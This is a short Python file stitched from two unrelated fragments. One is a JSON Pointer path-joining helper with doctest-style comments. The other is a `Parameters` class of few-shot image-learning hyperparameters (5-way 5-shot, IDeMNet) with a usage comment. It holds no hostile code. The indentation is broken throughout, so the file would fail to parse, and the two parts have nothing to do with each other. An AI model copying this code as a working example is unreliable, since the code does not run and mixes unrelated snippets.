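# Python. Illustrative sketch only:
#
#   >>> list(JsonPatch.from_diff({'a': 1}, {'a': True}))
#   [{'op': 'replace', 'path': '/a', 'value': True}]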
def _path_join(path, key):
if key is None:
return path
return path + '/' + str(key).replace('~', '~0').replace('/', '~1')
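# Example: _path_join escapes '~' before '/' inside a key, as required by the
# JSON Pointer syntax (RFC 6901). Illustrative sketch only:
#
#   >>> _path_join('/config', 'a/b~c')
#   '/config/a~1b~0c'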
import argparse
import os
class Parameters():
    def __init__(self):
# Training settings
self.LR=0.001
self.clsLR=0.001
self.batch_size=30
self.nthreads=8
self.tensorname='IDeMNet'
self.ways=5
self.shots=5
self.test_num=15
self.augnum=5
self.data='miniImageEmbedding'
self.network='None'
self.gallery_img=30
self.stepSize=10
self.patch_size=3
self.epoch=600
self.trainways=5
self.fixScale=0
self.GNet='none'
self.train_from_scratch=True
self.fix_deform=True
self.fix_emb=True
        self.chooseNum=15
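# Example: the class above is a plain container of default hyperparameters; a
# typical pattern is to instantiate it and override fields before training.
# Illustrative sketch only -- the attribute meanings are assumptions based on
# their names (e.g. a 5-way 5-shot episode setup):
#
#   opt = Parameters()
#   opt.batch_size = 64          # override a default
#   print(opt.ways, opt.shots)   # -> 5 5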